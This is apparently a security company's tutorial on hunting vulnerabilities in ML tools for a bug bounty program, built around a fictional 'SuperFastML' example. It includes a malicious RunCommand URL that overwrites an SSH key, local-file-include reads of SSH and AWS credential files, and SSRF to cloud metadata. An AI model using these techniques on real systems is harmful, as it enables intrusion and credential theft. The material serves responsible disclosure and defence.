Introduction
Bug Hunting in AI/ML Tools
The brave new world of machine learning (ML) comes with promises of speed, accuracy, and efficiency in nearly all tasks. What it doesn’t come with is promises of security. We intend to supercharge the security in this promising field with the release of an incentivized public program to crowdsource the discovery and elimination of vulnerabilities in the core tools. What many don’t realize, however, is that whether it’s traditional software security or ML security, the hunt for vulnerabilities remains the same. The exception to this would be Generative AI such as ChatGPT or StableDiffusion which do have their own unique security issues. In our research we have found these security issues to be significantly less practical for real-world application amongst hackers and thus we will focus on the more pressing need of security in the ML supply chain.
Major Skill Sets:
1. Web Security
- Specialty
Identify the common vulnerabilities in web applications and APIs such as the OWASP Top Ten. - Arsenal
Web application attack proxies such as BurpSuite or ZAP for discovery and the knowledge of how to leverage vulnerabilities found for maximum impact.
2. Code Review
- Specialty
Ability to read the source code with knowledge of common functions and patterns that are incorrectly implemented. - Arsenal
Static code analyzers and the knowledge to interpret and test their findings.
3. Exploit Development
- Specialty
Reading lower level programming language code such as C/C++ to find bugs related to incorrect object and memory handling that could result in unexpected exploitation. - Arsenal
Proficiency with tools such as libFuzzer to test areas of the code for potential vulnerabilities by exploring as many potential code paths as possible.
Exploit development generally requires more background knowledge, practice, and time spent hunting than the other skills so we will focus this introduction around web and code security.
Web/API Security
ML projects live and die by API calls. A person can both create and use an ML model entirely from their local disk, but the value and efficiency of the project is multiplied by sharing the model and the model predictions with multiple users. This is where the Machine Learning Operations (MLOps) and Inference servers come in. MLOps tools are designed to be a place to store and experiment with models and often come with a web application for easier usage. Inference servers are a way of allowing a user to send a request to the model and receive the model’s predictions in return via API calls. These web applications and APIs can be vulnerable to all the traditional web security attacks like cross-site scripting, local file includes, and privilege escalation.
The Basics
For traditional bug bounty hunters, web and API security skills will transfer 1:1 into the ML bug bounty field for tools that include a web or API in them. Examples include: MLflow, Airflow and H2O-3. For those looking to learn the basics, the following resources are excellent places to start.
Intros to web security research:
- PortSwigger academy: https://portswigger.net/web-security
- OWASP Web Testing Guide: https://owasp.org/www-project-web-security-testing-guide/v42/
- HackTricks Web Testing Guide: https://book.hacktricks.xyz/pentesting-web/web-vulnerabilities-methodology
Vulnerable practice environments:
- HackTheBox web challenges: https://hackthebox.com/
- Google Gruyere: https://google-gruyere.appspot.com/
- OWASP Juice Shop: https://owasp.org/www-project-juice-shop/
Security writeups:
- Awesome Bug Bounty Writeups: https://github.com/devanshbatham/Awesome-Bugbounty-Writeups
- Pentesterland: https://pentester.land/writeups/
- Infosec Writeups: https://infosecwriteups.com/tagged/bug-bounty
- MLSecOps: https://mlsecops.com/ai-ml-hacking-resources
After you’ve gained some background knowledge on web security research then time is best spent absorbing as many bug bounty reports as possible as they’ll give you the most realistic tips and tricks for acquiring valid findings.
From Web/API to ML
Search each library with a bounty on https://huntr.com for any kind of web or API server. For example, MLflow has a web UI built in. Download the project, setup your intercepting proxy such as BurpSuite, then explore the functionality of the web application or API to populate BurpSuite with requests. Now begin testing for vulnerabilities both manually and using the built-in automatic scanner.
The majority of the libraries currently in the Inference and MLOps section of the huntr bounties contain HTTP or API components. The Data Science and ML Frameworks sections of the huntr bounties are largely more established and secure libraries which means more time per vulnerability found, but the tradeoff is that vulnerabilities in those libraries are extremely impactful given the wide-spread, cross-domain usage of most of them. It is our recommendation that beginners focus first on the MLOps and Inference categories and move into the Data Science and ML Frameworks libraries after some experience. Some exceptions to this rule of thumb exist such as H2O-3 which is a great target for researchers.
What Should I Look For?
Protect AI researchers have found a multitude of vulnerabilities in these tools and in our research certain patterns have appeared. There are three classes of high severity vulnerabilities that keep appearing: excessive access to the server’s filesystem, server-side request forgery, and remote code execution.
FAP, SSRF and RCEs
The prime example of file access permissions gone wrong is the MLflow local file include vulnerability written about here. Server-side request forgery was found in the comparable tool Kubeflow as written about here. Remote code execution has been found in some libraries as well, but are currently pending verification.
Compared to traditional web applications that commonly only deal with simple image or document uploads and little else, ML tools are required to do a lot of work with local and remote files. Data and models are both files that need flexibility to live in various places in the local or remote file system and ML libraries need access to read and write to them to perform their work. The problem arises when developers opt for convenience over security. It is more convenient for both developer and user to have the ML library require very few restrictions on read/write access to the filesystem the tool is run on. There are no standard places models and data live in a filesystem so many ML library developers have taken this to mean complete access to the filesystem is good for users.
Second, remote code execution is easy to accidentally introduce. Many ML libraries start as programmatic interfaces that require some programming skill to use. This prevents nontechnical folks from using the library so a web UI is added for a point and click interface rather than a programmatic one. The problem is that often this UI will expose remote API calls to the programmatic interface which may not have been developed with remote access in mind. That means a remote user might be able to send an API request through the web UI and end up gaining arbitrary code execution on the remote server. Additionally, model files themselves are highly susceptible to code injection, see: https://protectai.com/blog/announcing-modelscan. If the web UI allows the remote upload of model files and then runs them there’s a high chance of remote code execution.
Static Code Analysis
If you’re looking for the most likely vulnerable targets before you dive in deep, static code analysis is an excellent use of your time for target acquisition. Simply download the GitHub repository, load the directory in your IDE of choice such as PyCharm or VSCode, install the free Snyk plugin in the IDE, and scan the library with Snyk. The project with the most Snyk findings is likely the softest target for a quick vulnerability and payout through huntr.
The majority of findings inside of Snyk are likely to be false positives, but it’s worth it to go through them one by one and verify. Path Traversal has been the most common finding we’ve seen in Snyk racking up hundreds of hits in the libraries we’ve tested. 99% of the time it’s a false positive as it’s a traversal that requires access to the programmatic interface. If you have access to the programmatic interface or local utility scripts in the project directory, then you already have access to the filesystem. However, we’ve seen a strong correlation between the number of Snyk’s Path Traversal findings and valid File Include vulnerabilities in APIs and web interfaces.
A Far Too Realistic Scenario
A user is trying to predict housing prices in a location. They have a CSV file of housing prices over the past 10 years but some of the data is not in a form that a model can read. A house’s price might be a string instead of an integer and the model needs that column of data to be an integer in order to make predictions based on it. An ML library called SuperFastML was recently released to automatically clean the CSV dataset and create a prediction model with it.
SuperFastML stands up a web UI application to make this process as easy as possible for the user. The user downloads the library, starts the server, then goes to Firefox and visits their local IP address and port that the UI started up on, let’s say that is http://192.168.1.9:12345. The user then clicks a big Upload button, uploads their CSV file, the library cleans it, then trains a model using the data. The user then inspects their cleaned CSV file in the UI to make sure it looks right and saves it for later. The user navigates to the newly created model in the UI and uploads other CSVs of housing data so the model can make predictions on future housing prices.
Super convenient! In 5 minutes, a user that knows not a blessed thing about AI gets results that would’ve taken a highly educated engineer months of effort only a few years ago. Unfortunately, things have gone horribly, horribly wrong. Let’s take a look at the most likely places critical vulnerabilities can exist in this library.
The Web UI Application
The web UI starts on http://192.168.1.9:12345. Can you spot the problem? 192.168.1.9 is a network-exposed address. Other computers on the local network, such as other wifi users or other employees in your department, can also visit SuperFastML’s web UI hosted on your computer. This means any vulnerability in the web server is exploitable by another malicious user on the network or a hacker who phished or exploited their way into the network, such as a VPN password or exploit. Furthermore, SuperFastML’s developers expected that since it was stood up locally by a user, there was no need for authentication. This may be surprising, but in our experience with web UI’s in ML tools, authentication is the exception not the rule. Due to this not only are vulnerabilities now remotely exploitable, but all your data and models are exposed to anyone that scans the network with a tool like nmap or WitnessMe.
What if SuperFastML only allowed itself to be hosted on 127.0.0.1? This is the local loopback interface which is only accessible to users logged into the server SuperFastML is hosted on. No problem. SuperFastML expects that it’s only going to be accessible to local users and as such provides an API endpoint which can execute code because local users already have code execution permissions. Other silly security protections such as Cross-Site Request Forgery tokens don’t matter for the same reason, it’s just local users on a local application, right? Eh… no.
A malicious user hosts some custom JavaScript on a server they own that makes an XHR request to the command execution endpoint and asks the endpoint to overwrite the private SSH key of a user: http://127.0.0.1:12345/api/RunCommand?cmd=”echo ‘-----BEGIN OPENSSH PRIVATE KEY-----[...]’ > /home/danmcinerney/.ssh/id_rsa”
. This link is sent to a user of SuperFastML. Surely CORS will stop this because the malicious site is making a request to a different domain, right? Eh… no again. There’s something called a Simple Request. Simple Requests are requests which have a limited number of headers and are GET, POST or HEAD. These requests do not trigger a preflight CORS request which would stop this attack. Instead, the end user of SuperFastML clicks the malicious link and bam, their private SSH key is overwritten by the attacker’s SSH key and the attacker can now login to the server remotely.
File Upload and Viewing
For starters, data files can have many different extensions. For convenience, many (most?) ML libraries including SuperFastML will allow any type of file extension to be uploaded. If the application is written in Java, then a .jsp backdoor can be uploaded and used for remote code execution. Models are even more difficult to filter as their file extension is completely arbitrary. To filter models properly the file data itself needs to be inspected. Given the glut of model file formats this is a herculean task that is simply skipped by most ML libraries. System allows the upload of the commonly-used pickle format? Remote code execution. Upload of raw code models? Remote code execution. Check the README here for more information: https://github.com/protectai/modelscan
Second, powerful Local File Include vulnerabilities live in this area as well. As we mentioned before, a pattern in ML libraries is allowing the user far too much access to the local file system. This includes the reading of files. Like many other ML libraries, SuperFastML allows the user to specify which directory to store data and models. Attacker selects /home/danmcinerney/.ssh/ as the location they’d like to store models and data. Now the attacker simply makes a request to view a certain data file named id_rsa and what do you know, the attacker can now log into the server SuperFastML is hosted on as the user danmcinerney. Most ML applications at least attempt to filter out LFI attacks, but as we saw in MLflow, it’s not uncommon for these protections to be bypassable. To exploit SuperFastML, you, the intrepid security researcher, simply search for a regex pattern looking for file paths in all requests you made to the service: ^(\/[^\/\0]+)+\/?$. Voila! LFI with high potential to remote code execution through private cloud keys such as /home/danmcinerney/.aws/credentials or /home/danmcinerney/.ssh/id_rsa.
In the same vein, Server-Side Request Forgery (SSRF) is even more common. SuperFastML wants the user to be able to upload data from S3 buckets and other remote servers because this is convenient! Searching for strings such as “http://”, “ftp://”, “s3://”, “file=”, “filename=”, or a regex like \b[a-zA-Z][a-zA-Z0-9+.-]*:\/\/\S+ in all the requests you made to SuperFastML is likely to turn up several locations that force SuperFastML to make a request and return the response directly to the user. You can use this for several practical attacks: denial of service attack against an external target that comes directly from SuperFastML, payload the request with a link to a site that hosts an XSS payload and send it to another user, or query sensitive internal locations such as cloud metadata hosted at http://169.254.169.254/user-data/ or internal IP addresses such as the router configuration page.
Conclusion
AI/ML libraries are still chock full of juicy low-hanging fruit due to the speed of development and desire for user convenience in the ML industry. We’ve incentivized the discovery of these vulnerabilities in https://huntr.com with lucrative payouts to help raise the bar for security in the industry as fast as possible. Note that none of the research or statements here are denigrating the great work ML library developers have done, often completely unpaid. They generally are not coming from professional web development backgrounds and may not have the requisite knowledge to stop or even know about the most common attacks. The state of AI/ML security is simply how every new emerging technology starts off. Remote login protocols like telnet in the 70’s, Remote messaging protocols like SMB in the 80’s, websites in the 90’s, mobile applications in the 00’s, it takes a bit of time to dial in the security implications of emerging technologies and our job as researchers is to speed that process up!